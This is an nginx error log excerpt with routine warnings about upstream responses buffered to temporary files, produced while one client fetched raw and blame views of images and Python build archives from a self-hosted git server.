2026/02/17 14:37:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000014283 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png"
2026/02/17 14:37:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000014284 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:37:40 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/28/0000014285 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:37:47 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000014286 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png"
2026/02/17 14:37:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000014287 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:39:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000014288 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip"
2026/02/17 14:40:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000014289 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip"
2026/02/17 14:40:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000014290 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip"
2026/02/17 14:40:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000014291 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip"
2026/02/17 14:40:39 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000014292 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip"
2026/02/17 14:40:44 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000014293 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip"
2026/02/17 14:40:49 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000014294 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip"
2026/02/17 14:41:26 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000014295 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip"
2026/02/17 14:41:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000014296 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip"
2026/02/17 14:46:30 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000014297 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html"
2026/02/17 14:46:43 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000014298 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png"
2026/02/17 14:46:53 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000014299 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png"
2026/02/17 14:46:59 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000014300 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png"
2026/02/17 14:47:02 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000014301 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png"
2026/02/17 14:47:12 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000014302 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png"
2026/02/17 14:47:18 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000014303 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png"
2026/02/17 14:47:25 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000014304 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png"
2026/02/17 14:53:15 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000014305 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:53:21 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000014306 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:53:27 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/30/0000014307 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:53:49 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/30/0000014308 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:54:02 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/30/0000014309 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:56:11 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/31/0000014310 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz"
2026/02/17 14:56:24 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/31/0000014311 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz"
2026/02/17 14:56:48 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/31/0000014312 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:56:57 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/31/0000014313 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:57:15 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/31/0000014314 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:57:23 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/31/0000014315 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 14:57:55 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/31/0000014316 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz"
2026/02/17 14:58:01 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/31/0000014317 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz"
2026/02/17 14:59:05 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/31/0000014318 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz"
2026/02/17 14:59:42 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/31/0000014319 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz"
2026/02/17 14:59:51 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/32/0000014320 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip"
2026/02/17 15:00:02 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/32/0000014321 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip"
